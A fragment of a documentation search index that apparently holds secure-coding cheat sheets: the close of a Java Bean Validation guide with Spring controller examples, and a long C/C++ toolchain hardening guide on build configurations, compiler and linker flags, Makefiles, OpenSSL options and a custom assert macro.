import javax.validation.constraints.Past;\nimport javax.validation.constraints.Future;\n\nimport java.util.Date;\n\npublic class DoctorVisit {\n\n//Constraint: Birthdate must be in the past\n@Past\nprivate Date birthDate;\n\npublic Date getBirthDate() {\nreturn birthDate;\n}\n\npublic void setBirthDate(Date birthDate) {\nthis.birthDate = birthDate;\n}\n\n//Constraint: Scheduled visit date must be in the future\n@Future\nprivate Date scheduledVisitDate;\n\npublic Date getScheduledVisitDate() {\nreturn scheduledVisitDate;\n}\n\npublic void setScheduledVisitDate(Date scheduledVisitDate) {\nthis.scheduledVisitDate = scheduledVisitDate;\n}\n\n...\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.DoctorVisit;\n\n@Controller\npublic class DoctorVisitController {\n\n...\n\n@RequestMapping(value = \"/scheduleVisit\", method = RequestMethod.POST)\npublic @ResponseBody String scheduleVisit(@Valid DoctorVisit doctorVisit, BindingResult result,\nHttpServletResponse response) {\n\nif (result.hasErrors()) {\nString errorMessage = \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\nfor (ObjectError e : errors) {\nerrorMessage += \"ERROR: \" + e.getDefaultMessage();\n}\nreturn errorMessage;\n} else {\nreturn \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#combining-constraints","title":"Combining Constraints","text":"

Validation annotations can be combined in any suitable way. For instance, to specify a valid reviewRating value between 1 and 5, specify the validation like this:

Annotation:

@Min(value=), @Max(value=)

Data Type:

BigDecimal, BigInteger, byte, short, int, long and the respective wrappers of the primitive types; Additionally supported by HV: any sub-type of CharSequence (the numeric value represented by the character sequence is evaluated), any sub-type of Number

Use:

Checks whether the annotated value is higher than or equal to the specified minimum (@Min) or lower than or equal to the specified maximum (@Max)

Reference:

Documentation

Model:

import javax.validation.constraints.Min;\nimport javax.validation.constraints.Max;\n\npublic class Review {\n\n//Constraint: Review rating must be between 1 and 5\n@Min(1)\n@Max(5)\nprivate int reviewRating;\n\npublic int getReviewRating() {\nreturn reviewRating;\n}\n\npublic void setReviewRating(int reviewRating) {\nthis.reviewRating = reviewRating;\n}\n...\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Review;\n\n@Controller\npublic class ReviewController {\n\n...\n\n@RequestMapping(value = \"/postReview\", method = RequestMethod.POST)\npublic @ResponseBody String postReview(@Valid Review review, BindingResult result,\nHttpServletResponse response) {\n\nif (result.hasErrors()) {\nString errorMessage = \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\nfor (ObjectError e : errors) {\nerrorMessage += \"ERROR: \" + e.getDefaultMessage();\n}\nreturn errorMessage;\n} else {\nreturn \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#cascading-constraints","title":"Cascading Constraints","text":"

Validating one bean is a good start, but often beans are nested or form a complete graph of beans. To validate that graph in one go, apply cascading validation with @Valid, as sketched below.
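
Below is a minimal sketch of cascading validation, reusing the Customer bean from the @Digits example above; the Order class and its fields are illustrative and not part of the original cheat sheet. Annotating the nested bean with @Valid causes its own constraints to be checked whenever the parent is validated.

import javax.validation.Valid;\nimport javax.validation.constraints.Size;\n\npublic class Order {\n\n//Constraint: cascade validation into the nested Customer bean\n@Valid\nprivate Customer customer;\n\n//Constraint: order notes limited to 500 characters\n@Size(max = 500)\nprivate String notes;\n\npublic Customer getCustomer() {\nreturn customer;\n}\n\npublic void setCustomer(Customer customer) {\nthis.customer = customer;\n}\n\n...\n}\n

When an Order instance is validated (for example, via @Valid on a controller method parameter as in the examples above), the constraints declared on the nested Customer are validated as well.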

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#additional-constraints","title":"Additional Constraints","text":"

In addition to providing the complete set of JSR303 constraints, Hibernate Validator also defines some additional constraints for convenience:

Take a look at this table for the complete list.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#custom-constraints","title":"Custom Constraints","text":"

One of the most powerful features of bean validation is the ability to define your own constraints that go beyond the simple validation offered by built-in constraints.

Creating custom constraints is beyond the scope of this guide. Please see this documentation.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#error-messages","title":"Error Messages","text":"

It is possible to specify a message ID with the validation annotation, so that error messages are customized:

@Pattern(regexp = \"[a-zA-Z0-9 ]+\", message = \"article.title.error\")\nprivate String articleTitle;\n

Spring MVC will then look up a message with ID article.title.error in a defined MessageSource. More on this can be found in the MessageSource documentation.
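
As a hedged sketch (the bean names and the messages basename are illustrative, and the exact wiring may differ depending on how your Spring MVC application is configured), the MessageSource can be connected to the Bean Validation validator so constraint messages are resolved from messages.properties:

import org.springframework.context.MessageSource;\nimport org.springframework.context.annotation.Bean;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.context.support.ReloadableResourceBundleMessageSource;\nimport org.springframework.validation.beanvalidation.LocalValidatorFactoryBean;\n\n@Configuration\npublic class ValidationConfig {\n\n@Bean\npublic MessageSource messageSource() {\nReloadableResourceBundleMessageSource messageSource = new ReloadableResourceBundleMessageSource();\n// Resolves keys such as article.title.error from messages.properties on the classpath\nmessageSource.setBasename(\"classpath:messages\");\nreturn messageSource;\n}\n\n// Make the validator resolve constraint messages through the MessageSource\n@Bean\npublic LocalValidatorFactoryBean validator(MessageSource messageSource) {\nLocalValidatorFactoryBean validator = new LocalValidatorFactoryBean();\nvalidator.setValidationMessageSource(messageSource);\nreturn validator;\n}\n}\n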

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html","title":"C-Based Toolchain Hardening Cheat Sheet","text":""},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#introduction","title":"Introduction","text":"

C-Based Toolchain Hardening is a treatment of project settings that will help you deliver reliable and secure code when using C, C++ and Objective C languages in a number of development environments. This article will examine Microsoft and GCC toolchains for the C, C++ and Objective C languages. It will guide you through the steps you should take to create executables with firmer defensive postures and increased integration with the available platform security. Effectively configuring the toolchain also means your project will enjoy a number of benefits during development, including enhanced warnings and static analysis, and self-debugging code.

There are four areas to be examined when hardening the toolchain: configuration, preprocessor, compiler, and linker. Nearly all areas are overlooked or neglected when setting up a project. The neglect appears to be pandemic, and it applies to nearly all projects, including Auto-configured, Makefile-based, Eclipse-based, Visual Studio-based, and Xcode-based projects. It's important to address the gaps at configuration and build time because it's difficult or impossible to add hardening to a distributed executable after the fact on some platforms.

This is a prescriptive article, and it will not debate semantics or speculate on behavior. Some information, such as the C/C++ committee's motivation and pedigree for program diagnostics, NDEBUG, assert, and abort(), appears to be lost like a tale in the Lord of the Rings. As such, the article will specify semantics (for example, the philosophy of 'debug' and 'release' build configurations), assign behaviors (for example, what an assert should do in 'debug' and 'release' build configurations), and present a position. If you find the posture too aggressive, then back off as required to suit your taste.

A secure toolchain is not a silver bullet. It is one piece of an overall strategy in the engineering process to help ensure success. It will complement existing processes such as static analysis, dynamic analysis, secure coding, negative test suites, and the like. Tools such as Valgrind and Helgrind will still be needed. And a project will still require solid designs and architectures.

The OWASP ESAPI C++ project eats its own dog food. Many of the examples you will see in this article come directly from the ESAPI C++ project.

Finally, a Cheat Sheet is available for those who desire a terse treatment of the material. Please visit C-Based Toolchain Hardening Cheat Sheet for the abbreviated version.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#wisdom","title":"Wisdom","text":"

Code must be correct. It should be secure. It can be efficient.

Dr. Jon Bentley: \"If it doesn't have to be correct, I can make it as fast as you'd like it to be\".

Dr. Gary McGraw: \"Thou shalt not rely solely on security features and functions to build secure software as security is an emergent property of the entire system and thus relies on building and integrating all parts properly\".

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#configuration","title":"Configuration","text":"

Configuration is the first opportunity to set your project up for success. Not only do you have to configure your project to meet reliability and security goals, you must also configure integrated libraries properly. You typically have three choices. First, you can use auto-configuration utilities if on Linux or Unix. Second, you can write a makefile by hand. This is predominant on Linux, macOS, and Unix, but it applies to Windows as well. Finally, you can use an integrated development environment or IDE.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#build-configurations","title":"Build Configurations","text":"

At this stage in the process, you should concentrate on configuring for two builds: Debug and Release. Debug will be used for development and include full instrumentation. Release will be configured for production. The difference between the two settings is usually the optimization level and debug level. A third build configuration is Test, and it's usually a special case of Release.

For debug and release builds, the settings are typically diametrically opposed. Debug configurations have no optimizations and full debug information, while Release builds have optimizations and minimal to moderate debug information. In addition, debug code has full assertions and additional library integration, such as mudflap and malloc guards such as dmalloc.

The Test configuration is often a Release configuration that makes everything public for testing and builds a test harness. For example, all member functions (C++ classes) and all interfaces (library or shared object) should be made available for testing. Many object-oriented purists oppose testing private interfaces, but this is not about object-orientedness. This (q.v.) is about building reliable and secure software.

GCC 4.8 introduced the -Og optimization level. Note that it is only an optimization level, and a customary debug level via -g is still required.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#debug-builds","title":"Debug Builds","text":"

Debug builds are where developers spend most of their time when vetting problems, so this build should concentrate forces and tools, or be a 'force multiplier'. Though many do not realize it, debug code is more highly valued than release code because it's adorned with additional instrumentation. The debug instrumentation will cause a program to become nearly \"self-debugging\", and help you catch mistakes such as bad parameters, failed API calls, and memory problems.

Self-debugging code reduces your time during troubleshooting and debugging. Reducing time under the debugger means you have more time for development and feature requests. If code is checked in without debug instrumentation, it should be fixed by adding instrumentation or rejected.

For GCC, optimizations and debug symbolication are controlled through two switches: -O and -g. You should use the following as part of your CFLAGS and CXXFLAGS for a minimal debug session:

-O0 -g3 -ggdb\n

-O0 turns off optimizations and -g3 ensures maximum debug information is available. You may need to use -O1 so some analysis is performed; otherwise, your debug build will be missing a number of warnings not present in release builds. -g3 ensures maximum debugging information is available for the debug session, including symbolic constants and #defines. -ggdb includes extensions to help with a debug session under GDB. For completeness, Jan Krachtovil stated in a private email that -ggdb currently has no effect.

Release builds should also consider the configuration pair of -mfunction-return=thunk and -mindirect-branch=thunk. These are the \"Retpoline\" fix, which is an indirect branch used to thwart speculative execution CPU vulnerabilities such as Spectre and Meltdown. The CPU cannot tell what code to speculatively execute because it is an indirect (as opposed to a direct) branch. This is an extra layer of indirection, like calling a pointer through a pointer.

Debug builds should also define DEBUG, and ensure NDEBUG is not defined. NDEBUG removes \"program diagnostics\" and has undesirable behavior and side effects, which are discussed below in more detail. The defines should be present for all code, and not just the program. You use them for all code (your program and included libraries) because you need to know how they fail too (remember, you take the bug report - not the third party library).

In addition, you should use other relevant flags, such as -fno-omit-frame-pointer. Ensuring a frame pointer exists makes it easier to decode stack traces. Since debug builds are not shipped, it's OK to leave symbols in the executable. Programs with debug information do not suffer performance hits. See, for example, How does the gcc -g option affect performance?

Finally, you should ensure your project includes additional diagnostic libraries, such as dmalloc and Address Sanitizer. A comparison of some memory checking tools can be found at Comparison Of Memory Tools. If you don't include additional diagnostics in debug builds, then you should start using them, since it's OK to find errors you are not looking for.
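
As a hedged illustration (availability depends on your compiler; Address Sanitizer is present in GCC 4.8 and later and in Clang), a debug build could enable the sanitizer by adding the following to CFLAGS and CXXFLAGS, and also passing -fsanitize=address at link time:

-O0 -g3 -ggdb -fsanitize=address -fno-omit-frame-pointer\n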

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#release-builds","title":"Release Builds","text":"

Release builds are what your customer receives. They are meant to be run on production hardware and servers, and they should be reliable, secure, and efficient. A stable release build is the product of the hard work and effort during development.

For release builds, you should use the following as part of CFLAGS and CXXFLAGS:

-On -g2\n

-On sets optimizations for speed or size (for example, -Os or -O2), and -g2 ensures debugging information is created.

Debugging information should be stripped from the shipped executable and retained separately, so crash reports from the field can be symbolicated. While not desired, debug information can be left in place without a performance penalty. See How does the gcc -g option affect performance? for details.

Release builds should also define NDEBUG, and ensure DEBUG is not defined. The time for debugging and diagnostics is over, so users get production code with full optimizations, no \"program diagnostics\", and other efficiencies. If you can't optimize or you are performing excessive logging, it usually means the program is not ready for production.

If you have been relying on an assert and then a subsequent abort(), you have been abusing \"program diagnostics\" since it has no place in production code. If you want a memory dump, create one so users don't have to worry about secrets and other sensitive information being written to the filesystem and emailed in plain text.

For Windows, you would use /Od for debug builds; and /Ox, /O2 or /Os for release builds. See Microsoft's /O Options (Optimize Code) for details.
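
As a hedged illustration (the source file name is a placeholder), the first command below is a debug compile with optimizations disabled and debug information enabled, and the second is a release compile; the DEBUG/NDEBUG defines follow the conventions discussed later in this article:

cl /Od /Zi /DDEBUG=1 program.cpp\ncl /O2 /DNDEBUG=1 program.cpp\n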

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#test-builds","title":"Test Builds","text":"

Test builds are used to provide heuristic validation by way of positive and negative test suites. Under a test configuration, all interfaces are tested to ensure they perform to specification and satisfaction. \"Satisfaction\" is subjective, but it should include no crashing and no trashing of your memory arena, even when faced with negative tests.

Because all interfaces are tested (and not just the public ones), your CFLAGS and CXXFLAGS should include:

-Dprotected=public -Dprivate=public\n

You should also change __attribute__ ((visibility (\"hidden\"))) to __attribute__ ((visibility (\"default\"))).

Nearly everyone gets a positive test right, so no more needs to be said. The negative self tests are much more interesting, and you should concentrate on trying to make your program fail so you can verify it fails gracefully. Remember, a bad actor is not going to be courteous when they attempt to cause your program to fail. And it's your project that takes egg on the face by way of a bug report or guest appearance on Full Disclosure or Bugtraq - not <some library> you included.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#auto-tools","title":"Auto Tools","text":"

Auto configuration tools are popular on many Linux and Unix based systems, and the tools include Autoconf, Automake, config, and Configure. The tools work together to produce project files from scripts and template files. After the process completes, your project should be set up and ready to be made with make.

When using auto configuration tools, there are a few files of interest worth mentioning. The files are part of the auto tools chain and include m4 and the various *.in, *.ac (autoconf), and *.am (automake) files. At times, you will have to open them, or the resulting makefiles, to tune the \"stock\" configuration.

There are three downsides to the command-line configuration tools in the toolchain: (1) they often ignore user requests, (2) they cannot create configurations, and (3) security is often not a goal.

To demonstrate the first issue, configure your project with the following: configure CFLAGS=\"-Wall -fPIE\" CXXFLAGS=\"-Wall -fPIE\" LDFLAGS=\"-pie\". You will probably find the auto tools ignored your request, which means the command below will not produce expected results. As a workaround, you will have to open an m4 script, Makefile.in or Makefile.am and fix the configuration; a sketch of that workaround follows the command below.

$ configure CFLAGS=\"-Wall -Wextra -Wconversion -fPIE -Wno-unused-parameter\n    -Wformat=2 -Wformat-security -fstack-protector-all -Wstrict-overflow\"\nLDFLAGS=\"-pie -z,noexecstack -z,noexecheap -z,relro -z,now\"\n

For the second point, you will probably be disappointed to learn Automake does not support the concept of configurations. It's not entirely Autoconf's or Automake's fault - Make and its inability to detect changes is the underlying problem. Specifically, Make only checks modification times of prerequisites and targets, and does not check things like CFLAGS and CXXFLAGS. The net effect is you will not receive expected results when you issue make debug and then make test or make release.

Finally, you will probably be disappointed to learn tools such as Autoconf and Automake miss many security related opportunities and ship insecure out of the box. There are a number of compiler switches and linker flags that improve the defensive posture of a program, but they are not 'on' by default. Tools like Autoconf - which are supposed to handle this situation - often provide settings that serve the lowest common denominator.

A recent discussion on the Automake mailing list illuminates the issue: Enabling compiler warning flags. Attempts to improve default configurations were met with resistance and no action was taken. The resistance is often of the form, \"<some useful warning> also produces false positives\" or \"<some obscure platform> does not support <established security feature>\". It's noteworthy that David Wheeler, the author of Secure Programming for Linux and Unix HOWTO, was one of the folks trying to improve the posture.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#makefiles","title":"Makefiles","text":"

Make is one of the earliest build tools, dating back to the 1970s. It's available on Linux, macOS and Unix, so you will frequently encounter projects using it. Unfortunately, Make has a number of shortcomings (Recursive Make Considered Harmful and What's Wrong With GNU make?), and can cause some discomfort. Despite issues with Make, ESAPI C++ uses Make primarily for three reasons: first, it's omnipresent; second, it's easier to manage than the Auto Tools family; and third, libtool was out of the question.

Consider what happens when you (1) type make debug, and then (2) type make release. Each build would require different CFLAGS due to optimizations and level of debug support. In your makefile, you would extract the relevant target and set CFLAGS and CXXFLAGS similar to below (taken from ESAPI C++ Makefile):

## Makefile\nDEBUG_GOALS = $(filter $(MAKECMDGOALS), debug)\nifneq ($(DEBUG_GOALS),)\n    WANT_DEBUG := 1\n    WANT_TEST := 0\n    WANT_RELEASE := 0\nendif\n\u2026\n\nifeq ($(WANT_DEBUG),1)\n    ESAPI_CFLAGS += -DDEBUG=1 -UNDEBUG -g3 -ggdb -O0\n    ESAPI_CXXFLAGS += -DDEBUG=1 -UNDEBUG -g3 -ggdb -O0\nendif\n\nifeq ($(WANT_RELEASE),1)\n    ESAPI_CFLAGS += -DNDEBUG=1 -UDEBUG -g -O2\n    ESAPI_CXXFLAGS += -DNDEBUG=1 -UDEBUG -g -O2\nendif\n\nifeq ($(WANT_TEST),1)\n    ESAPI_CFLAGS += -DESAPI_NO_ASSERT=1 -g2 -ggdb -O2 -Dprivate=public\n                                                      -Dprotected=public\n    ESAPI_CXXFLAGS += -DESAPI_NO_ASSERT=1 -g2 -ggdb -O2 -Dprivate=public\n                                                        -Dprotected=public\nendif\n\u2026\n\n## Merge ESAPI flags with user supplied flags. We perform the extra step to ensure\n## user options follow our options, which should give user option's a preference.\noverride CFLAGS := $(ESAPI_CFLAGS) $(CFLAGS)\noverride CXXFLAGS := $(ESAPI_CXXFLAGS) $(CXXFLAGS)\noverride LDFLAGS := $(ESAPI_LDFLAGS) $(LDFLAGS)\n\u2026\n

Make will first build the program in a debug configuration for a session under the debugger using a rule similar to:

%.o: %.cpp\n        $(CXX) $(CPPFLAGS) $(CXXFLAGS) -c $< -o $@\n

When you want the release build, Make will do nothing because it considers everything up to date despite the fact CFLAGS and CXXFLAGS have changed. Hence, your program will actually be in a debug configuration and risk a SIGABRT at runtime because debug instrumentation is present (recall assert calls abort() when NDEBUG is not defined). In essence, you have DoS'd yourself due to make.

In addition, many projects do not honor the user's command-line. ESAPI C++ does its best to ensure a user's flags are honored via override as shown above, but other projects do not. For example, consider a project that should be built with Position Independent Executable (PIE or ASLR) enabled and data execution prevention (DEP) enabled. Dismissing user settings combined with insecure out of the box settings (and not picking them up during auto-setup or auto-configure) means a program built with the following will likely have neither defense:

make CFLAGS=\"-fPIE\" CXXFLAGS=\"-fPIE\" LDFLAGS=\"-pie -z,noexecstack, -z,noexecheap\"\n

Defenses such as ASLR and DEP are especially important on Linux because Data Execution - not Prevention - is the norm.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#integration","title":"Integration","text":"

Project level integration presents opportunities to harden your program or library with domain specific knowledge. For example, if the platform supports Position Independent Executables (PIE or ASLR) and data execution prevention (DEP), then you should integrate with it. The consequences of not doing so could result in exploitation. As a case in point, see KingCope's 0-days for MySQL in December, 2012 (CVE-2012-5579 and CVE-2012-5612, among others). Integration with platform security would have neutered a number of the 0-days.

You also have the opportunity to include helpful libraries that are not needed for business logic support. For example, if you are working on a platform with DMalloc or Address Sanitizer, you should probably use it in your debug builds. For Ubuntu, DMalloc is available from the package manager and can be installed with sudo apt install libdmalloc5. For Apple platforms, it's available as a scheme option. Address Sanitizer is available in GCC 4.8 and above for many platforms.

In addition, project level integration is an opportunity to harden third party libraries you chose to include. Because you chose to include them, you and your users are responsible for them. If you or your users endure a SP800-53 audit, third party libraries will be in scope because the supply chain is included (specifically, item SA-12, Supply Chain Protection). The audits are not limited to those in the US Federal arena - financial institutions perform reviews too. A perfect example of violating this guidance is CVE-2012-1525, which was due to Adobe's inclusion of a defective Sablotron library.

Another example is including OpenSSL. You know (1) SSLv2 is insecure, (2) SSLv3 is insecure, and (3) compression is insecure (among others). In addition, suppose you don't use hardware and engines, and only allow static linking. Given the knowledge and specifications, you would configure the OpenSSL library as follows:

$ Configure darwin64-x86_64-cc -no-hw -no-engine -no-comp -no-shared\n    -no-dso -no-ssl2 -no-ssl3 --openssldir=\u2026\n

Note Well: you might want engines, especially on Ivy Bridge microarchitectures (3rd generation Intel Core i5 and i7 processors). To have OpenSSL use the processor's random number generator (via the rdrand instruction), you will need to call OpenSSL's ENGINE_load_rdrand() function and then ENGINE_set_default with ENGINE_METHOD_RAND. See OpenSSL's Random Numbers for details.

If you configure without the switches, then you will likely have vulnerable code/libraries and risk failing an audit. If the program is a remote server, then the following command will reveal if compression is active on the channel:

echo \"GET / HTTP1.0\" | openssl s_client -connect <nowiki>example.com:443</nowiki>\n

nm or openssl s_client will show that compression is enabled in the client. In fact, any symbol guarded by the OPENSSL_NO_COMP preprocessor macro will bear witness, since -no-comp is translated into a CFLAGS define.

$ nm /usr/local/ssl/iphoneos/lib/libcrypto.a 2>/dev/null | egrep -i \"(COMP_CTX_new|COMP_CTX_free)\"\n0000000000000110 T COMP_CTX_free\n0000000000000000 T COMP_CTX_new\n

Even more egregious is the answer given to auditors who specifically ask about configurations and protocols: \"we don't use weak/wounded/broken ciphers\" or \"we follow best practices.\" The use of compression tells the auditor that you are using a wounded protocol in an insecure configuration and you don't follow best practices. That will likely set off alarm bells, and ensure the auditor dives deeper on more items.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#preprocessor","title":"Preprocessor","text":"

The preprocessor is crucial to setting up a project for success. The C committee provided one macro - NDEBUG - and the macro can be used to derive a number of configurations and drive engineering processes. Unfortunately, the committee also left many related items to chance, which has resulted in programmers abusing built-in facilities. This section will help you set up your projects to integrate well with other projects and ensure reliability and security.

There are three topics to discuss when hardening the preprocessor. The first is well defined configurations which produce well defined behaviors, the second is useful behavior from assert, and the third is proper use of macros when integrating vendor code and third party libraries.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#configurations","title":"Configurations","text":"

To remove ambiguity, you should recognize two configurations: Release and Debug. Release is for production code on live servers, and its behavior is requested via the C/C++ NDEBUG macro. It's also the only macro observed by the C and C++ Committees and Posix. Diametrically opposed to Release is Debug. While there is a compelling argument for !defined(NDEBUG), you should have an explicit macro for the configuration, and that macro should be DEBUG. This is because vendors and outside libraries use a DEBUG (or similar) macro for their configuration. For example, Carnegie Mellon's Mach kernel uses DEBUG, Microsoft's CRT uses _DEBUG, and Wind River Workbench uses DEBUG_MODE.

In addition to NDEBUG (Release) and DEBUG (Debug), you have two additional cross products: both are defined or neither are defined. Defining both should be an error, and defining neither should default to a release configuration. Below is from ESAPI C++ EsapiCommon.h, which is the configuration file used by all source files:

// Only one or the other, but not both\n#if (defined(DEBUG) || defined(_DEBUG)) && (defined(NDEBUG) || defined(_NDEBUG))\n# error Both DEBUG and NDEBUG are defined.\n#endif\n\n// The only time we switch to debug is when asked.\n// NDEBUG or {nothing} results\n// in release build (fewer surprises at runtime).\n#if defined(DEBUG) || defined(_DEBUG)\n# define ESAPI_BUILD_DEBUG 1\n#else\n# define ESAPI_BUILD_RELEASE 1\n#endif\n

When DEBUG is in effect, your code should receive full debug instrumentation, including the full force of assertions.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#assert","title":"ASSERT","text":"

Asserts will help you create self-debugging code by helping you find the point of first failure quickly and easily. Asserts should be used throughout your program, including parameter validation, return value checking and program state. The assert will silently guard your code through its lifetime. It will always be there, even when not debugging a specific component of a module. If you have thorough code coverage, you will spend less time debugging and more time developing because programs will debug themselves.

To use asserts effectively, you should assert everything. That includes parameters upon entering a function, return values from function calls, and any program state. Everywhere you place an if statement for validation or checking, you should have an assert. Everywhere you have an assert for validation or checking, you should have an if statement. They go hand-in-hand.

If you are still using printf's, then you have an opportunity for improvement. In the time it takes for you to write a printf or NSLog statement, you could have written an assert. Unlike the printf or NSLog which are often removed when no longer needed, the assert stays active forever. Remember, this is all about finding the point of first failure quickly so you can spend your time doing other things.

There is one problem with using asserts - Posix states assert should call abort() if NDEBUG is not defined. When debugging, NDEBUG will never be defined since you want the \"program diagnostics\" (quote from the Posix description). The behavior makes assert and its accompanying abort() completely useless for development. The result of \"program diagnostics\" calling abort() due to standard C/C++ behavior is disuse - developers simply don't use them. It's incredibly bad for the development community because self-debugging programs can help eradicate so many stability problems.

Since self-debugging programs are so powerful, you will have to supply your own assert and signal handler with improved behavior. Your assert will exchange auto-aborting behavior for auto-debugging behavior. The auto-debugging facility will ensure the debugger snaps when a problem is detected, and you will find the point of first failure quickly and easily.

ESAPI C++ supplies its own assert with the behavior described above. In the code below, ASSERT raises SIGTRAP when in effect or it evaluates to void in other cases.

// A debug assert which should be sprinkled liberally.\n// This assert fires and then continues rather\n// than calling abort(). Useful when examining negative\n// test cases from the command-line.\n#if (defined(ESAPI_BUILD_DEBUG) && defined(ESAPI_OS_STARNIX))\n#  define ESAPI_ASSERT1(exp) {                                    \\\n    if(!(exp)) {                                                  \\\n        std::ostringstream oss;                                     \\\n        oss << \"Assertion failed: \" << (char*)(__FILE__) << \"(\"     \\\n            << (int)__LINE__ << \"): \" << (char*)(__func__)          \\\n            << std::endl;                                           \\\n        std::cerr << oss.str();                                     \\\n        raise(SIGTRAP);                                             \\\n    }                                                             \\\n    }\n#  define ESAPI_ASSERT2(exp, msg) {                               \\\n    if(!(exp)) {                                                  \\\n        std::ostringstream oss;                                     \\\n        oss << \"Assertion failed: \" << (char*)(__FILE__) << \"(\"     \\\n            << (int)__LINE__ << \"): \" << (char*)(__func__)          \\\n            << \": \\\"\" << (msg) << \"\\\"\" << std::endl;                \\\n        std::cerr << oss.str();                                     \\\n        raise(SIGTRAP);                                             \\\n    }                                                             \\\n    }\n#elif (defined(ESAPI_BUILD_DEBUG) && defined(ESAPI_OS_WINDOWS))\n#  define ESAPI_ASSERT1(exp)      assert(exp)\n#  define ESAPI_ASSERT2(exp, msg) assert(exp)\n#else\n#  define ESAPI_ASSERT1(exp)      ((void)(exp))\n#  define ESAPI_ASSERT2(exp, msg) ((void)(exp))\n#endif\n\n#if !defined(ASSERT)\n#  define ASSERT(exp)     ESAPI_ASSERT1(exp)\n#endif\n

At program startup, a SIGTRAP handler will be installed if one is not provided by another component:

    struct DebugTrapHandler\n{\nDebugTrapHandler()\n{\nstruct sigaction new_handler, old_handler;\n\ndo\n{\nint ret = 0;\n\nret = sigaction (SIGTRAP, NULL, &old_handler);\nif (ret != 0) break; // Failed\n\n// Don't step on another's handler\nif (old_handler.sa_handler != NULL) break;\n\nnew_handler.sa_handler = &DebugTrapHandler::NullHandler;\nnew_handler.sa_flags = 0;\n\nret = sigemptyset (&new_handler.sa_mask);\nif (ret != 0) break; // Failed\n\nret = sigaction (SIGTRAP, &new_handler, NULL);\nif (ret != 0) break; // Failed\n\n} while(0);\n}\n\nstatic void NullHandler(int /*unused*/) { }\n\n};\n\n// We specify a relatively low priority, to make sure we run before other CTORs\n// http://gcc.gnu.org/onlinedocs/gcc/C_002b_002b-Attributes.html#C_002b_002b-Attributes\nstatic const DebugTrapHandler g_dummyHandler __attribute__ ((init_priority (110)));\n

On a Windows platform, you would call _set_invalid_parameter_handler (and possibly set_unexpected or set_terminate) to install a new handler.

Live hosts running production code should always define NDEBUG (i.e., release configuration), which means they do not assert or auto-abort. Auto-abortion is not acceptable behavior, and anyone who asks for the behavior is completely abusing the functionality of \"program diagnostics\". If a program wants a core dump, then it should create the dump rather than crashing.

For more reading on asserting effectively, please see one of John Robbins' books, such as Debugging Applications. John is a legendary bug slayer in Windows circles, and he will show you how to do nearly everything, from debugging a simple program to bug slaying in multithreaded programs.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#additional-macros","title":"Additional Macros","text":"

Additional macros include any macros needed to integrate properly and securely. It includes integrating the program with the platform (for example MFC or Cocoa/CocoaTouch) and libraries (for example, Crypto++ or OpenSSL). It can be a challenge because you have to have proficiency with your platform and all included libraries and frameworks. The list below illustrates the level of detail you will need when integrating.

Though Boost is missing from the list, it appears to lack recommendations, additional debug diagnostics, and a hardening guide. See BOOST Hardening Guide (Preprocessor Macros) for details. In addition, Tim Day points to [boost.build] should we not define _SECURE_SCL=0 by default for all msvc toolsets for a recent discussion related to hardening (or lack thereof).

In addition to what you should define, defining some macros and undefining others should trigger a security related defect. For example, -U_FORTIFY_SOURCE on Linux and _CRT_SECURE_NO_WARNINGS=1, _SCL_SECURE_NO_WARNINGS, _ATL_SECURE_NO_WARNINGS or STRSAFE_NO_DEPRECATE on Windows.

a) Be careful with _GLIBCXX_DEBUG when using pre-compiled libraries such as Boost from a distribution. There are ABI incompatibilities, and the result will likely be a crash. You will have to compile Boost with _GLIBCXX_DEBUG or omit _GLIBCXX_DEBUG.

b) See Chapter 5, Diagnostics of the libstdc++ manual for details.

c) SQLite secure deletion zeroizes memory on destruction. Define as required, and always define in US Federal since zeroization is required for FIPS 140-2, Level 1.

d) N is 0644 by default, which means everyone has some access.

e) Force temporary tables into memory (no unencrypted data to disk).
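
As a hedged illustration of notes c) through e) (the values shown are examples, not mandates; SQLITE_TEMP_STORE=3 forces temporary storage into memory), the corresponding SQLite compile-time defines could be added to CFLAGS:

-DSQLITE_SECURE_DELETE=1 -DSQLITE_DEFAULT_FILE_PERMISSIONS=0600 -DSQLITE_TEMP_STORE=3\n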

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#compiler-and-linker","title":"Compiler and Linker","text":"

Compiler writers provide a rich set of warnings from the analysis of code during compilation. Both GCC and Visual Studio have static analysis capabilities to help find mistakes early in the development process. The built-in static analysis capabilities of GCC and Visual Studio are usually sufficient to ensure proper API usage and catch a number of mistakes such as using an uninitialized variable or comparing a negative signed int and a positive unsigned int.

